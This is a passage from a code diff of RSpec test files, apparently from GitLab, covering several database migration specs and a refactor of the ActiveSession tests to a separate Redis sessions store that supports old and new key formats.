iterations_cadence_id: nil, start_date: Date.new(2021, 11, 15), due_date: Date.new(2021, 11, 20), iid: 3, title: 'c') } + + describe '#up' do + it "correctly sets the sequence attribute with idempotency" do + migration.up + + expect(iteration_1.reload.sequence).to be 1 + expect(iteration_2.reload.sequence).to be 2 + expect(iteration_3.reload.sequence).to be 1 + expect(iteration_4.reload.sequence).to be nil + + iteration_5 = sprints.create!(id: 5, group_id: group.id, iterations_cadence_id: cadence_1.id, start_date: Date.new(2022, 1, 1), due_date: Date.new(2022, 1, 5), iid: 1, title: 'e' ) + + migration.down + migration.up + + expect(iteration_1.reload.sequence).to be 1 + expect(iteration_2.reload.sequence).to be 2 + expect(iteration_5.reload.sequence).to be 3 + expect(iteration_3.reload.sequence).to be 1 + expect(iteration_4.reload.sequence).to be nil + end + end +end diff --git a/spec/migrations/20211203091642_add_index_to_projects_on_marked_for_deletion_at_spec.rb b/spec/migrations/20211203091642_add_index_to_projects_on_marked_for_deletion_at_spec.rb new file mode 100644 index 00000000000..2e1289c58f7 --- /dev/null +++ b/spec/migrations/20211203091642_add_index_to_projects_on_marked_for_deletion_at_spec.rb @@ -0,0 +1,18 @@ +# frozen_string_literal: true + +require 'spec_helper' +require_migration! + +RSpec.describe AddIndexToProjectsOnMarkedForDeletionAt do + it 'correctly migrates up and down' do + reversible_migration do |migration| + migration.before -> { + expect(ActiveRecord::Base.connection.indexes('projects').map(&:name)).not_to include('index_projects_not_aimed_for_deletion') + } + + migration.after -> { + expect(ActiveRecord::Base.connection.indexes('projects').map(&:name)).to include('index_projects_not_aimed_for_deletion') + } + end + end +end diff --git a/spec/migrations/schedule_recalculate_vulnerability_finding_signatures_for_findings_spec.rb b/spec/migrations/schedule_recalculate_vulnerability_finding_signatures_for_findings_spec.rb new file mode 100644 index 00000000000..2545bb4a66c --- /dev/null +++ b/spec/migrations/schedule_recalculate_vulnerability_finding_signatures_for_findings_spec.rb @@ -0,0 +1,88 @@ +# frozen_string_literal: true + +require 'spec_helper' +require_migration! + +RSpec.describe ScheduleRecalculateVulnerabilityFindingSignaturesForFindings, :migration do + before do + allow(Gitlab).to receive(:ee?).and_return(ee?) + stub_const("#{described_class.name}::BATCH_SIZE", 2) + end + + context 'when the Gitlab instance is FOSS' do + let(:ee?) { false } + + it 'does not run the migration' do + expect { migrate! }.not_to change { BackgroundMigrationWorker.jobs.size } + end + end + + context 'when the Gitlab instance is EE' do + let(:ee?) { true } + + let_it_be(:namespaces) { table(:namespaces) } + let_it_be(:projects) { table(:projects) } + let_it_be(:findings) { table(:vulnerability_occurrences) } + let_it_be(:scanners) { table(:vulnerability_scanners) } + let_it_be(:identifiers) { table(:vulnerability_identifiers) } + let_it_be(:vulnerability_finding_signatures) { table(:vulnerability_finding_signatures) } + + let_it_be(:namespace) { namespaces.create!(name: 'test', path: 'test') } + let_it_be(:project) { projects.create!(namespace_id: namespace.id, name: 'gitlab', path: 'gitlab') } + + let_it_be(:scanner) do + scanners.create!(project_id: project.id, external_id: 'trivy', name: 'Security Scanner') + end + + let_it_be(:identifier) do + identifiers.create!(project_id: project.id, + fingerprint: 'd432c2ad2953e8bd587a3a43b3ce309b5b0154c123', + external_type: 'SECURITY_ID', + external_id: 'SECURITY_0', + name: 'SECURITY_IDENTIFIER 0') + end + + let_it_be(:finding1) { findings.create!(finding_params) } + let_it_be(:signature1) { vulnerability_finding_signatures.create!(finding_id: finding1.id, algorithm_type: 0, signature_sha: ::Digest::SHA1.digest(SecureRandom.hex(50))) } + + let_it_be(:finding2) { findings.create!(finding_params) } + let_it_be(:signature2) { vulnerability_finding_signatures.create!(finding_id: finding2.id, algorithm_type: 0, signature_sha: ::Digest::SHA1.digest(SecureRandom.hex(50))) } + + let_it_be(:finding3) { findings.create!(finding_params) } + let_it_be(:signature3) { vulnerability_finding_signatures.create!(finding_id: finding3.id, algorithm_type: 0, signature_sha: ::Digest::SHA1.digest(SecureRandom.hex(50))) } + + it 'schedules the background jobs', :aggregate_failure do + Sidekiq::Testing.fake! do + freeze_time do + migrate! + + expect(BackgroundMigrationWorker.jobs.size).to eq(2) + expect(described_class::MIGRATION) + .to be_scheduled_migration_with_multiple_args(signature1.id, signature2.id) + expect(described_class::MIGRATION) + .to be_scheduled_migration_with_multiple_args(signature3.id, signature3.id) + end + end + end + + def finding_params + uuid = SecureRandom.uuid + + { + severity: 0, + confidence: 5, + report_type: 2, + project_id: project.id, + scanner_id: scanner.id, + primary_identifier_id: identifier.id, + location: nil, + project_fingerprint: SecureRandom.hex(20), + location_fingerprint: Digest::SHA1.hexdigest(SecureRandom.hex(10)), + uuid: uuid, + name: "Vulnerability Finding #{uuid}", + metadata_version: '1.3', + raw_metadata: '{}' + } + end + end +end diff --git a/spec/migrations/schedule_update_timelogs_null_spent_at_spec.rb b/spec/migrations/schedule_update_timelogs_null_spent_at_spec.rb new file mode 100644 index 00000000000..a81059518e6 --- /dev/null +++ b/spec/migrations/schedule_update_timelogs_null_spent_at_spec.rb @@ -0,0 +1,44 @@ +# frozen_string_literal: true + +require 'spec_helper' +require_migration! + +RSpec.describe ScheduleUpdateTimelogsNullSpentAt do + let_it_be(:namespace) { table(:namespaces).create!(name: 'namespace', path: 'namespace') } + let_it_be(:project) { table(:projects).create!(namespace_id: namespace.id) } + let_it_be(:issue) { table(:issues).create!(project_id: project.id) } + let_it_be(:merge_request) { table(:merge_requests).create!(target_project_id: project.id, source_branch: 'master', target_branch: 'feature') } + let_it_be(:timelog1) { create_timelog!(merge_request_id: merge_request.id) } + let_it_be(:timelog2) { create_timelog!(merge_request_id: merge_request.id) } + let_it_be(:timelog3) { create_timelog!(merge_request_id: merge_request.id) } + let_it_be(:timelog4) { create_timelog!(issue_id: issue.id) } + let_it_be(:timelog5) { create_timelog!(issue_id: issue.id) } + + before_all do + table(:timelogs).where.not(id: timelog3.id).update_all(spent_at: nil) + end + + it 'correctly schedules background migrations' do + stub_const("#{described_class}::BATCH_SIZE", 2) + + Sidekiq::Testing.fake! do + freeze_time do + migrate! + + expect(described_class::MIGRATION) + .to be_scheduled_delayed_migration(2.minutes, timelog1.id, timelog2.id) + + expect(described_class::MIGRATION) + .to be_scheduled_delayed_migration(4.minutes, timelog4.id, timelog5.id) + + expect(BackgroundMigrationWorker.jobs.size).to eq(2) + end + end + end + + private + + def create_timelog!(**args) + table(:timelogs).create!(**args, time_spent: 1) + end +end diff --git a/spec/models/active_session_spec.rb b/spec/models/active_session_spec.rb index 2fd7b127500..751d31ad95a 100644 --- a/spec/models/active_session_spec.rb +++ b/spec/models/active_session_spec.rb @@ -2,7 +2,8 @@ require 'spec_helper' -RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do +RSpec.describe ActiveSession, :clean_gitlab_redis_sessions do + let(:lookup_key) { described_class.lookup_key_name(user.id) } let(:user) do create(:user).tap do |user| user.current_sign_in_at = Time.current @@ -43,52 +44,88 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do end describe '.list' do + def make_session(id) + described_class.new(session_id: id) + end + it 'returns all sessions by user' do - Gitlab::Redis::SharedState.with do |redis| - redis.set("session:user:gitlab:#{user.id}:6919a6f1bb119dd7396fadc38fd18d0d", Marshal.dump({ session_id: 'a' })) - redis.set("session:user:gitlab:#{user.id}:59822c7d9fcdfa03725eff41782ad97d", Marshal.dump({ session_id: 'b' })) - redis.set("session:user:gitlab:9999:5c8611e4f9c69645ad1a1492f4131358", '') + Gitlab::Redis::Sessions.with do |redis| + # Some deprecated sessions + redis.set(described_class.key_name_v1(user.id, "6919a6f1bb119dd7396fadc38fd18d0d"), Marshal.dump(make_session('a'))) + redis.set(described_class.key_name_v1(user.id, "59822c7d9fcdfa03725eff41782ad97d"), Marshal.dump(make_session('b'))) + # Some new sessions + redis.set(described_class.key_name(user.id, 'some-unique-id-x'), make_session('c').dump) + redis.set(described_class.key_name(user.id, 'some-unique-id-y'), make_session('d').dump) + # Some red herrings + redis.set(described_class.key_name(9999, "5c8611e4f9c69645ad1a1492f4131358"), 'irrelevant') + redis.set(described_class.key_name_v1(9999, "5c8611e4f9c69645ad1a1492f4131358"), 'irrelevant') redis.sadd( - "session:lookup:user:gitlab:#{user.id}", + lookup_key, %w[ 6919a6f1bb119dd7396fadc38fd18d0d 59822c7d9fcdfa03725eff41782ad97d + some-unique-id-x + some-unique-id-y ] ) end - expect(ActiveSession.list(user)).to match_array [{ session_id: 'a' }, { session_id: 'b' }] + expect(described_class.list(user)).to contain_exactly( + have_attributes(session_id: 'a'), + have_attributes(session_id: 'b'), + have_attributes(session_id: 'c'), + have_attributes(session_id: 'd') + ) end - it 'does not return obsolete entries and cleans them up' do - Gitlab::Redis::SharedState.with do |redis| - redis.set("session:user:gitlab:#{user.id}:6919a6f1bb119dd7396fadc38fd18d0d", Marshal.dump({ session_id: 'a' })) + shared_examples 'ignoring obsolete entries' do + let(:session_id) { '6919a6f1bb119dd7396fadc38fd18d0d' } + let(:session) { described_class.new(session_id: 'a') } - redis.sadd( - "session:lookup:user:gitlab:#{user.id}", - %w[ - 6919a6f1bb119dd7396fadc38fd18d0d - 59822c7d9fcdfa03725eff41782ad97d - ] - ) - end + it 'does not return obsolete entries and cleans them up' do + Gitlab::Redis::Sessions.with do |redis| + redis.set(session_key, serialized_session) + + redis.sadd( + lookup_key, + [ + session_id, + '59822c7d9fcdfa03725eff41782ad97d' + ] + ) + end - expect(ActiveSession.list(user)).to eq [{ session_id: 'a' }] + expect(ActiveSession.list(user)).to contain_exactly(session) - Gitlab::Redis::SharedState.with do |redis| - expect(redis.sscan_each("session:lookup:user:gitlab:#{user.id}").to_a).to eq ['6919a6f1bb119dd7396fadc38fd18d0d'] + Gitlab::Redis::Sessions.with do |redis| + expect(redis.sscan_each(lookup_key)).to contain_exactly session_id + end end end - it 'returns an empty array if the use does not have any active session' do - expect(ActiveSession.list(user)).to eq [] + context 'when the current session is in the old format' do + let(:session_key) { described_class.key_name_v1(user.id, session_id) } + let(:serialized_session) { Marshal.dump(session) } + + it_behaves_like 'ignoring obsolete entries' + end + + context 'when the current session is in the new format' do + let(:session_key) { described_class.key_name(user.id, session_id) } + let(:serialized_session) { session.dump } + + it_behaves_like 'ignoring obsolete entries' + end + + it 'returns an empty array if the user does not have any active session' do + expect(ActiveSession.list(user)).to be_empty end end describe '.list_sessions' do it 'uses the ActiveSession lookup to return original sessions' do - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| # Emulate redis-rack: https://github.com/redis-store/redis-rack/blob/c75f7f1a6016ee224e2615017fbfee964f23a837/lib/rack/session/redis.rb#L88 redis.set("session:gitlab:#{rack_session.private_id}", Marshal.dump({ _csrf_token: 'abcd' })) @@ -107,19 +144,17 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do describe '.session_ids_for_user' do it 'uses the user lookup table to return session ids' do - session_ids = ['59822c7d9fcdfa03725eff41782ad97d'] - - Gitlab::Redis::SharedState.with do |redis| - redis.sadd("session:lookup:user:gitlab:#{user.id}", session_ids) + Gitlab::Redis::Sessions.with do |redis| + redis.sadd(lookup_key, %w[a b c]) end - expect(ActiveSession.session_ids_for_user(user.id).map(&:to_s)).to eq(session_ids) + expect(ActiveSession.session_ids_for_user(user.id).map(&:to_s)).to match_array(%w[a b c]) end end describe '.sessions_from_ids' do it 'uses the ActiveSession lookup to return original sessions' do - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| # Emulate redis-rack: https://github.com/redis-store/redis-rack/blob/c75f7f1a6016ee224e2615017fbfee964f23a837/lib/rack/session/redis.rb#L88 redis.set("session:gitlab:#{rack_session.private_id}", Marshal.dump({ _csrf_token: 'abcd' })) end @@ -128,7 +163,7 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do end it 'avoids a redis lookup for an empty array' do - expect(Gitlab::Redis::SharedState).not_to receive(:with) + expect(Gitlab::Redis::Sessions).not_to receive(:with) expect(ActiveSession.sessions_from_ids([])).to eq([]) end @@ -137,7 +172,7 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do stub_const('ActiveSession::SESSION_BATCH_SIZE', 1) redis = double(:redis) - expect(Gitlab::Redis::SharedState).to receive(:with).and_yield(redis) + expect(Gitlab::Redis::Sessions).to receive(:with).and_yield(redis) sessions = %w[session-a session-b] mget_responses = sessions.map { |session| [Marshal.dump(session)]} @@ -151,49 +186,67 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do it 'sets a new redis entry for the user session and a lookup entry' do ActiveSession.set(user, request) - Gitlab::Redis::SharedState.with do |redis| + session_id = "2::418729c72310bbf349a032f0bb6e3fce9f5a69df8f000d8ae0ac5d159d8f21ae" + + Gitlab::Redis::Sessions.with do |redis| expect(redis.scan_each.to_a).to include( - "session:user:gitlab:#{user.id}:2::418729c72310bbf349a032f0bb6e3fce9f5a69df8f000d8ae0ac5d159d8f21ae", - "session:lookup:user:gitlab:#{user.id}" + described_class.key_name(user.id, session_id), # current session + described_class.key_name_v1(user.id, session_id), # support for mixed deployment + lookup_key ) end end it 'adds timestamps and information from the request' do - Timecop.freeze(Time.zone.parse('2018-03-12 09:06')) do - ActiveSession.set(user, request) + time = Time.zone.parse('2018-03-12 09:06') - session = ActiveSession.list(user) + travel_to(time) do + described_class.set(user, request) - expect(session.count).to eq 1 - expect(session.first).to have_attributes( + sessions = described_class.list(user) + + expect(sessions).to contain_exactly have_attributes( ip_address: '127.0.0.1', browser: 'Mobile Safari', os: 'iOS', device_name: 'iPhone 6', device_type: 'smartphone', - created_at: Time.zone.parse('2018-03-12 09:06'), - updated_at: Time.zone.parse('2018-03-12 09:06') + created_at: eq(time), + updated_at: eq(time) ) end end + it 'is possible to log in only using the old session key' do + session_id = "2::418729c72310bbf349a032f0bb6e3fce9f5a69df8f000d8ae0ac5d159d8f21ae" + ActiveSession.set(user, request) + + Gitlab::Redis::SharedState.with do |redis| + redis.del(described_class.key_name(user.id, session_id)) + end + + sessions = ActiveSession.list(user) + + expect(sessions).to be_present + end + it 'keeps the created_at from the login on consecutive requests' do - now = Time.zone.parse('2018-03-12 09:06') + created_at = Time.zone.parse('2018-03-12 09:06') + updated_at = created_at + 1.minute - Timecop.freeze(now) do + travel_to(created_at) do ActiveSession.set(user, request) + end - Timecop.freeze(now + 1.minute) do - ActiveSession.set(user, request) + travel_to(updated_at) do + ActiveSession.set(user, request) - session = ActiveSession.list(user) + session = ActiveSession.list(user) - expect(session.first).to have_attributes( - created_at: Time.zone.parse('2018-03-12 09:06'), - updated_at: Time.zone.parse('2018-03-12 09:07') - ) - end + expect(session.first).to have_attributes( + created_at: eq(created_at), + updated_at: eq(updated_at) + ) end end end @@ -201,22 +254,20 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do describe '.destroy_session' do shared_examples 'removes all session data' do before do - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| redis.set("session:user:gitlab:#{user.id}:#{active_session_lookup_key}", '') # Emulate redis-rack: https://github.com/redis-store/redis-rack/blob/c75f7f1a6016ee224e2615017fbfee964f23a837/lib/rack/session/redis.rb#L88 redis.set("session:gitlab:#{rack_session.private_id}", '') - redis.set(described_class.key_name(user.id, active_session_lookup_key), - Marshal.dump(active_session)) - redis.sadd(described_class.lookup_key_name(user.id), - active_session_lookup_key) + redis.set(session_key, serialized_session) + redis.sadd(lookup_key, active_session_lookup_key) end end it 'removes the devise session' do subject - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| expect(redis.scan_each(match: "session:gitlab:*").to_a).to be_empty end end @@ -224,15 +275,15 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do it 'removes the lookup entry' do subject - Gitlab::Redis::SharedState.with do |redis| - expect(redis.scan_each(match: "session:lookup:user:gitlab:#{user.id}").to_a).to be_empty + Gitlab::Redis::Sessions.with do |redis| + expect(redis.scan_each(match: lookup_key).to_a).to be_empty end end it 'removes the ActiveSession' do subject - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| expect(redis.scan_each(match: "session:user:gitlab:*").to_a).to be_empty end end @@ -253,7 +304,19 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do let(:active_session) { ActiveSession.new(session_private_id: rack_session.private_id) } let(:active_session_lookup_key) { rack_session.private_id } - include_examples 'removes all session data' + context 'when using old session key serialization' do + let(:session_key) { described_class.key_name_v1(user.id, active_session_lookup_key) } + let(:serialized_session) { Marshal.dump(active_session) } + + include_examples 'removes all session data' + end + + context 'when using new session key serialization' do + let(:session_key) { described_class.key_name(user.id, active_session_lookup_key) } + let(:serialized_session) { active_session.dump } + + include_examples 'removes all session data' + end end end end @@ -265,19 +328,17 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do ActiveSession.destroy_all_but_current(user, nil) end - context 'with user sessions' do + shared_examples 'with user sessions' do let(:current_session_id) { '6919a6f1bb119dd7396fadc38fd18d0d' } before do - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| # setup for current user [current_session_id, '59822c7d9fcdfa03725eff41782ad97d'].each do |session_public_id| session_private_id = Rack::Session::SessionId.new(session_public_id).private_id active_session = ActiveSession.new(session_private_id: session_private_id) - redis.set(described_class.key_name(user.id, session_private_id), - Marshal.dump(active_session)) - redis.sadd(described_class.lookup_key_name(user.id), - session_private_id) + redis.set(key_name(user.id, session_private_id), dump_session(active_session)) + redis.sadd(lookup_key, session_private_id) end # setup for unrelated user @@ -285,10 +346,8 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do session_private_id = Rack::Session::SessionId.new('5c8611e4f9c69645ad1a1492f4131358').private_id active_session = ActiveSession.new(session_private_id: session_private_id) - redis.set(described_class.key_name(unrelated_user_id, session_private_id), - Marshal.dump(active_session)) - redis.sadd(described_class.lookup_key_name(unrelated_user_id), - session_private_id) + redis.set(key_name(unrelated_user_id, session_private_id), dump_session(active_session)) + redis.sadd(described_class.lookup_key_name(unrelated_user_id), session_private_id) end end @@ -303,19 +362,17 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do session_private_id = Rack::Session::SessionId.new(current_session_id).private_id ActiveSession.destroy_all_but_current(user, request.session) - Gitlab::Redis::SharedState.with do |redis| - expect( - redis.smembers(described_class.lookup_key_name(user.id)) - ).to eq([session_private_id]) + Gitlab::Redis::Sessions.with do |redis| + expect(redis.smembers(lookup_key)).to contain_exactly session_private_id end end it 'does not remove impersonated sessions' do impersonated_session_id = '6919a6f1bb119dd7396fadc38fd18eee' - Gitlab::Redis::SharedState.with do |redis| - redis.set(described_class.key_name(user.id, impersonated_session_id), - Marshal.dump(ActiveSession.new(session_id: Rack::Session::SessionId.new(impersonated_session_id), is_impersonated: true))) - redis.sadd(described_class.lookup_key_name(user.id), impersonated_session_id) + Gitlab::Redis::Sessions.with do |redis| + redis.set(key_name(user.id, impersonated_session_id), + dump_session(ActiveSession.new(session_id: Rack::Session::SessionId.new(impersonated_session_id), is_impersonated: true))) + redis.sadd(lookup_key, impersonated_session_id) end expect { ActiveSession.destroy_all_but_current(user, request.session) }.to change { ActiveSession.session_ids_for_user(user.id).size }.from(3).to(2) @@ -323,155 +380,289 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do expect(ActiveSession.session_ids_for_user(9999).size).to eq(1) end end - end - describe '.cleanup' do - before do - stub_const("ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS", 5) - end + context 'with legacy sessions' do + def key_name(user_id, id) + described_class.key_name_v1(user_id, id) + end - it 'removes obsolete lookup entries' do - Gitlab::Redis::SharedState.with do |redis| - redis.set("session:user:gitlab:#{user.id}:6919a6f1bb119dd7396fadc38fd18d0d", '') - redis.sadd("session:lookup:user:gitlab:#{user.id}", '6919a6f1bb119dd7396fadc38fd18d0d') - redis.sadd("session:lookup:user:gitlab:#{user.id}", '59822c7d9fcdfa03725eff41782ad97d') + def dump_session(session) + Marshal.dump(session) end - ActiveSession.cleanup(user) + it_behaves_like 'with user sessions' + end - Gitlab::Redis::SharedState.with do |redis| - expect(redis.smembers("session:lookup:user:gitlab:#{user.id}")).to eq ['6919a6f1bb119dd7396fadc38fd18d0d'] + context 'with new sessions' do + def key_name(user_id, id) + described_class.key_name(user_id, id) + end + + def dump_session(session) + session.dump end + + it_behaves_like 'with user sessions' end + end - it 'does not bail if there are no lookup entries' do - ActiveSession.cleanup(user) + describe '.cleanup' do + before do + stub_const("ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS", 5) end - context 'cleaning up old sessions' do - let(:max_number_of_sessions_plus_one) { ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS + 1 } - let(:max_number_of_sessions_plus_two) { ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS + 2 } + shared_examples 'cleaning up' do + context 'when removing obsolete sessions' do + let(:current_session_id) { '6919a6f1bb119dd7396fadc38fd18d0d' } - before do - Gitlab::Redis::SharedState.with do |redis| - (1..max_number_of_sessions_plus_two).each do |number| - redis.set( - "session:user:gitlab:#{user.id}:#{number}", - Marshal.dump(ActiveSession.new(session_id: number.to_s, updated_at: number.days.ago)) - ) - redis.sadd( - "session:lookup:user:gitlab:#{user.id}", - "#{number}" - ) + it 'removes obsolete lookup entries' do + Gitlab::Redis::Sessions.with do |redis| + redis.set(session_key, '') + redis.sadd(lookup_key, current_session_id) + redis.sadd(lookup_key, '59822c7d9fcdfa03725eff41782ad97d') + end + + ActiveSession.cleanup(user) + + Gitlab::Redis::Sessions.with do |redis| + expect(redis.smembers(lookup_key)).to contain_exactly current_session_id end end end - it 'removes obsolete active sessions entries' do + it 'does not bail if there are no lookup entries' do ActiveSession.cleanup(user) + end - Gitlab::Redis::SharedState.with do |redis| - sessions = redis.scan_each(match: "session:user:gitlab:#{user.id}:*").to_a + context 'cleaning up old sessions' do + let(:max_number_of_sessions_plus_one) { ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS + 1 } + let(:max_number_of_sessions_plus_two) { ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS + 2 } + + before do + Gitlab::Redis::Sessions.with do |redis| + max_number_of_sessions_plus_two.times do |number| + redis.set( + key_name(user.id, number), + dump_session(ActiveSession.new(session_id: number.to_s, updated_at: number.days.ago)) + ) + redis.sadd(lookup_key, number.to_s) + end + end + end + + it 'removes obsolete active sessions entries' do + ActiveSession.cleanup(user) + + Gitlab::Redis::Sessions.with do |redis| + sessions = described_class.list(user) - expect(sessions.count).to eq(ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS) - expect(sessions).not_to include("session:user:gitlab:#{user.id}:#{max_number_of_sessions_plus_one}", "session:user:gitlab:#{user.id}:#{max_number_of_sessions_plus_two}") + expect(sessions.count).to eq(ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS) + expect(sessions).not_to include( + have_attributes(session_id: max_number_of_sessions_plus_one), + have_attributes(session_id: max_number_of_sessions_plus_two) + ) + end end - end - it 'removes obsolete lookup entries' do - ActiveSession.cleanup(user) + it 'removes obsolete lookup entries' do + ActiveSession.cleanup(user) - Gitlab::Redis::SharedState.with do |redis| - lookup_entries = redis.smembers("session:lookup:user:gitlab:#{user.id}") + Gitlab::Redis::Sessions.with do |redis| + lookup_entries = redis.smembers(lookup_key) - expect(lookup_entries.count).to eq(ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS) - expect(lookup_entries).not_to include(max_number_of_sessions_plus_one.to_s, max_number_of_sessions_plus_two.to_s) + expect(lookup_entries.count).to eq(ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS) + expect(lookup_entries).not_to include(max_number_of_sessions_plus_one.to_s, max_number_of_sessions_plus_two.to_s) + end end - end - it 'removes obsolete lookup entries even without active session' do - Gitlab::Redis::SharedState.with do |redis| - redis.sadd( - "session:lookup:user:gitlab:#{user.id}", - "#{max_number_of_sessions_plus_two + 1}" - ) + it 'removes obsolete lookup entries even without active session' do + Gitlab::Redis::Sessions.with do |redis| + redis.sadd(lookup_key, "#{max_number_of_sessions_plus_two + 1}") + end + + ActiveSession.cleanup(user) + + Gitlab::Redis::Sessions.with do |redis| + lookup_entries = redis.smembers(lookup_key) + + expect(lookup_entries.count).to eq(ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS) + expect(lookup_entries).not_to include( + max_number_of_sessions_plus_one.to_s, + max_number_of_sessions_plus_two.to_s, + (max_number_of_sessions_plus_two + 1).to_s + ) + end end - ActiveSession.cleanup(user) + context 'when the number of active sessions is lower than the limit' do + before do + Gitlab::Redis::Sessions.with do |redis| + ((max_number_of_sessions_plus_two - 4)..max_number_of_sessions_plus_two).each do |number| + redis.del(key_name(user.id, number)) + end + end + end - Gitlab::Redis::SharedState.with do |redis| - lookup_entries = redis.smembers("session:lookup:user:gitlab:#{user.id}") + it 'does not remove active session entries, but removes lookup entries' do + lookup_entries_before_cleanup = Gitlab::Redis::Sessions.with do |redis| + redis.smembers(lookup_key) + end - expect(lookup_entries.count).to eq(ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS) - expect(lookup_entries).not_to include( - max_number_of_sessions_plus_one.to_s, - max_number_of_sessions_plus_two.to_s, - (max_number_of_sessions_plus_two + 1).to_s - ) + sessions_before_cleanup = described_class.list(user) + + described_class.cleanup(user) + + Gitlab::Redis::Sessions.with do |redis| + lookup_entries = redis.smembers(lookup_key) + sessions = described_class.list(user) + + expect(sessions.count).to eq(sessions_before_cleanup.count) + expect(lookup_entries.count).to be < lookup_entries_before_cleanup.count + end + end end end - context 'when the number of active sessions is lower than the limit' do + context 'cleaning up old sessions stored by Rack::Session::SessionId#private_id' do + let(:max_number_of_sessions_plus_one) { ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS + 1 } + let(:max_number_of_sessions_plus_two) { ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS + 2 } + before do - Gitlab::Redis::SharedState.with do |redis| - ((max_number_of_sessions_plus_two - 4)..max_number_of_sessions_plus_two).each do |number| - redis.del("session:user:gitlab:#{user.id}:#{number}") + Gitlab::Redis::Sessions.with do |redis| + (1..max_number_of_sessions_plus_two).each do |number| + redis.set( + key_name(user.id, number), + dump_session(ActiveSession.new(session_private_id: number.to_s, updated_at: number.days.ago)) + ) + redis.sadd(lookup_key, number.to_s) end end end - it 'does not remove active session entries, but removes lookup entries' do - lookup_entries_before_cleanup = Gitlab::Redis::SharedState.with do |redis| - redis.smembers("session:lookup:user:gitlab:#{user.id}") - end + it 'removes obsolete active sessions entries' do + described_class.cleanup(user) - sessions_before_cleanup = Gitlab::Redis::SharedState.with do |redis| - redis.scan_each(match: "session:user:gitlab:#{user.id}:*").to_a - end + Gitlab::Redis::Sessions.with do |redis| + sessions = described_class.list(user) - ActiveSession.cleanup(user) - - Gitlab::Redis::SharedState.with do |redis| - lookup_entries = redis.smembers("session:lookup:user:gitlab:#{user.id}") - sessions = redis.scan_each(match: "session:user:gitlab:#{user.id}:*").to_a - expect(sessions.count).to eq(sessions_before_cleanup.count) - expect(lookup_entries.count).to be < lookup_entries_before_cleanup.count + expect(sessions.count).to eq(described_class::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS) + expect(sessions).not_to include( + key_name(user.id, max_number_of_sessions_plus_one), + key_name(user.id, max_number_of_sessions_plus_two) + ) end end end end - context 'cleaning up old sessions stored by Rack::Session::SessionId#private_id' do - let(:max_number_of_sessions_plus_one) { ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS + 1 } - let(:max_number_of_sessions_plus_two) { ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS + 2 } + context 'with legacy sessions' do + let(:session_key) { described_class.key_name_v1(user.id, current_session_id) } + + def key_name(user_id, session_id) + described_class.key_name_v1(user_id, session_id) + end + + def dump_session(session) + Marshal.dump(session) + end + + it_behaves_like 'cleaning up' + end + + context 'with new sessions' do + let(:session_key) { described_class.key_name(user.id, current_session_id) } + + def key_name(user_id, session_id) + described_class.key_name(user_id, session_id) + end + + def dump_session(session) + session.dump + end + + it_behaves_like 'cleaning up' + end + end + + describe '.cleaned_up_lookup_entries' do + before do + stub_const("ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS", 5) + end + + shared_examples 'cleaning up lookup entries' do + let(:current_session_id) { '6919a6f1bb119dd7396fadc38fd18d0d' } + let(:active_count) { 3 } before do Gitlab::Redis::SharedState.with do |redis| - (1..max_number_of_sessions_plus_two).each do |number| + active_count.times do |number| redis.set( - "session:user:gitlab:#{user.id}:#{number}", - Marshal.dump(ActiveSession.new(session_private_id: number.to_s, updated_at: number.days.ago)) - ) - redis.sadd( - "session:lookup:user:gitlab:#{user.id}", - "#{number}" + key_name(user.id, number), + dump_session(ActiveSession.new(session_id: number.to_s, updated_at: number.days.ago)) ) + + redis.sadd(lookup_key, number.to_s) end + + redis.sadd(lookup_key, (active_count + 1).to_s) + redis.sadd(lookup_key, (active_count + 2).to_s) end end - it 'removes obsolete active sessions entries' do - ActiveSession.cleanup(user) + it 'removes obsolete lookup entries' do + active = Gitlab::Redis::SharedState.with do |redis| + ActiveSession.cleaned_up_lookup_entries(redis, user) + end + + expect(active.count).to eq(active_count) Gitlab::Redis::SharedState.with do |redis| - sessions = redis.scan_each(match: "session:user:gitlab:#{user.id}:*").to_a + lookup_entries = redis.smembers(lookup_key) - expect(sessions.count).to eq(ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS) - expect(sessions).not_to( - include("session:user:gitlab:#{user.id}:#{max_number_of_sessions_plus_one}", - 